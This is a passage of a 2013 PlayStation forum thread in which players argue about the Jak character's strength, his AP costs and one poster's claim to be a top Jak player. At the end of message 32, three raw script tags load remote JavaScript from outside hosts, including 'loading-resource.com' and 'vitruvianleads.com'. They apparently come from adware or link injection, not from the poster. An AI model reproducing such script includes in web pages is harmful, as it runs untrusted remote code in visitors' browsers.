Reply
Treasure Hunter
Registered: 07/19/2012
Offline
7051 posts
 

Re: If your waiting for JaK to get buffed your wasting your time

[ Edited ]
Jan 26, 2013

shadow9531 wrote:
Okay name every single one of those 50+ people.

I'm waiting.

Also, you're either as stubborn as a mule or the definition of incompetence.

I see what your trying to do here. Its pretty insane to list 50+ people so you would take advantage of that which is quiet sad... Yeah im just going to rely on GFs. Go to Gamefaqs and make a topic about me saying is LES good with Jak or something and see what happens Smiley Happy

 

Im waiting...

 

Don't take to me about sturbborn or the definition of incompetence you hypocrite. In my defense these categories fit you actually Smiley Happy

 photo 1-Xzveb9U_zpsedcf7d52.png
Only time will tell.
Message 31 of 38 (185 Views)
Reply
0 Likes
Gaming Beast
Registered: 11/22/2012
Offline
2167 posts
 

Re: If your waiting for JaK to get buffed your wasting your time

[ Edited ]
Jan 27, 2013

BlueDiamond93 wrote:

Fromundaman wrote:
I have no problem with differing opinions. I even have no problem with a decent argument. I do have a problem with everyone getting attacked the moment they say something you don't agree with.

I honestly doubt you know everything there is to know about the character. Hell, I doubt anyone knows everything there is to know about any character. Even top level players like Dabuz, iiGGY, Dillon etc are finding new stuff for their characters (And widely used characters in the tournament scene like FP and EC too!) on a pretty regular basis.

Saying you've found everything just sounds like you're both full of and limiting yourself.


Also, if you look around the forums, and especially on other character threads, you'll see I act this way to most anyone with your attitude, or anyone who is spreading false information (In this case I can't say if you have or not, so that doesn't really apply. Again, I am not claiming to know more about Jak than you because that would be a bold faced lie. I probably know more about BD and GC, but not Jak.).


Now here's the thing, you also keep throwing out your ranking, which is impressive, but to my knowledge you have no tournament results. While I firmly believe you mostly know what you're talking about due to your experience and ranked placement, it is really silly to call yourself the best Jak when you have no tournament results, whereas there actually are other Jaks who have placed.

If I'm wrong and you actually do have legit tournament results, then I apologize for the little rant.


Basically, to make a long story short, I don't know how you are as a player, and I don't mean to start a fight, but you really need to stop being such a **bleep** to people, and maybe stop pulling a Pb_mal and throwing out "Best [character]" claims without tournament results.
Discussion helps the community a lot more than mindless attacks.

Did you read what I said?

 

Your first statement, last setenence is funny. I believe you are a steorotype because ive been attacked numerous times for no reason what so ever and you've said nothing on the matters. Don't attack people who have differing opinions. It starts out as a debate and then leads into an argument.

 

As I said before I never said I know everything about him or found everything about him COMBO BASED WISE! As for his character I do know him fully. I know what he lacks and what he has overall. 

 

So because of what I just said this is irrelevant to me.

 

 

I have results just not tournment related. I have faced plenty of Jak mainers and players to know that I am *ONE* not *THE* but *ONE* of the Top best Jak players. So don't misinterpret this like you did before.

 

Now don't talk to me about mindless atacks because I never attack people. I just get into arguments from stubborn and naive minds. Apparently you haven't seen how I constantly get attacked and use to in the past along with trolling. Anyways I explained the best character misunderstanding above so..


Then this seems to be a giant misunderstanding. TBH I have just seen you arguing and insulting people in Jak threads, but I admit I have rarely seen how they start, so if what you say is true, then I do apologize. I do know however that you have pulled this attitude on me before though when I stated I thought Jak might eventually get more play with the metagame going more aerial combat based. That being said, maybe we misinterpreted each other there too. I don't doubt that you are a good player in the least. I want that, at least, to be clear.






EDIT: Wow... when did this topic become about measuring e-peen? Like do either of you even have a real point anymore?

The Fro never sleeps.png


 

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 32 of 38 (175 Views)
Reply
0 Likes
Wastelander
Registered: 04/12/2009
Offline
616 posts
 

Re: If your waiting for JaK to get buffed your wasting your time

[ Edited ]
Jan 27, 2013

Blue, can't name them I see. Just making excuses.

 

I've fought you already anyways. You were spamming down circle the majority of the time and repeatedly got slapped down by Fat P's neutral square and didn't even do anything about it. You can't call yourself a great player if THAT happens.

 

Stop going on the forums and trying to talk like you know everything.

Message 33 of 38 (163 Views)
Reply
0 Likes
Hekseville Citizen
Registered: 11/22/2012
Offline
385 posts
 

Re: If your waiting for JaK to get buffed your wasting your time

Jan 27, 2013
What I want to know is, why on earth is his lvl 1 150 ap!? Hes not dante doing burst combos every 5 seconds...
December 11th 2012: Went 12-0 ranked FFA. (Jak)
December 13th 2012: Went 8-0 Stock Unranked FFA. (Jak)
January 10th 2013: Sniped Asis_aka_talent into Jak's lvl 1. (Uncle Radec)
April 16th 2013: Caught parappa's lvl 2 with Sweet Tooth's lvl 1 and didn't die in the process (Sweet Tooth)
May 5th 2013: Got my Radec eviscerated by whaatxddd's radec in 1v1. Kmart, u better watch out.
Just learnt "Drake" and is now learning "Nariko".
Message 34 of 38 (156 Views)
Reply
0 Likes
Uncharted Territory
Registered: 07/30/2012
Offline
1661 posts
 

Re: If your waiting for JaK to get buffed your wasting your time

Jan 27, 2013

Teh_Shade667 wrote:
What I want to know is, why on earth is his lvl 1 150 ap!? Hes not dante doing burst combos every 5 seconds...

No, but his attacks do have a pretty high AP rating across the board. He has access to a lot of 30 AP attacks.

 

That being said, he also has the most low AP attacks across the board, having a ton of 5 AP-ers too.

------------------------------------------------
Fresh to death
Message 35 of 38 (152 Views)
Reply
0 Likes
Uncharted Territory
Registered: 01/26/2013
Offline
1577 posts
 

Re: If your waiting for JaK to get buffed your wasting your time

Jan 27, 2013

I still pray for the day his level 2 chasing hanged into those 1-hit supers,preferabecho yellow Eco to shoot fireballs,or a true anti-air killer,Dark Eco Uppercut,aww yeahhhhhhh!

Click click click click click click click click................... I need to get off the forums.
Image and video hosting by TinyPic
Signature created by GFXNinja/CyborgHippo
Message 36 of 38 (144 Views)
Reply
0 Likes
Hekseville Citizen
Registered: 11/22/2012
Offline
385 posts
 

Re: If your waiting for JaK to get buffed your wasting your time

Jan 27, 2013
but what about sweet tooth and heihachi as well, both only need 100 ap for lvl 1, but have many 20-30 ap attacks in their arsenal, and very few attack that are 10 ap and under.
December 11th 2012: Went 12-0 ranked FFA. (Jak)
December 13th 2012: Went 8-0 Stock Unranked FFA. (Jak)
January 10th 2013: Sniped Asis_aka_talent into Jak's lvl 1. (Uncle Radec)
April 16th 2013: Caught parappa's lvl 2 with Sweet Tooth's lvl 1 and didn't die in the process (Sweet Tooth)
May 5th 2013: Got my Radec eviscerated by whaatxddd's radec in 1v1. Kmart, u better watch out.
Just learnt "Drake" and is now learning "Nariko".
Message 37 of 38 (142 Views)
Reply
0 Likes
Highlighted
Treasure Hunter
Registered: 07/19/2012
Offline
7051 posts
 

Re: If your waiting for JaK to get buffed your wasting your time

Jan 27, 2013

shadow9531 wrote:

Blue, can't name them I see. Just making excuses.

 

I've fought you already anyways. You were spamming down circle the majority of the time and repeatedly got slapped down by Fat P's neutral square and didn't even do anything about it. You can't call yourself a great player if THAT happens.

 

Stop going on the forums and trying to talk like you know everything.


Alright from this point on im done with you. You come into every Jak topic lying your @ss off about me and misleading peoples minds. I have many many people who know im an amazing Jak player so you can believe what you want with you ignorant mindset.

 

Im a skilled and great Jak player and I know it Smiley Happy

 photo 1-Xzveb9U_zpsedcf7d52.png
Only time will tell.
Message 38 of 38 (139 Views)
Reply
0 Likes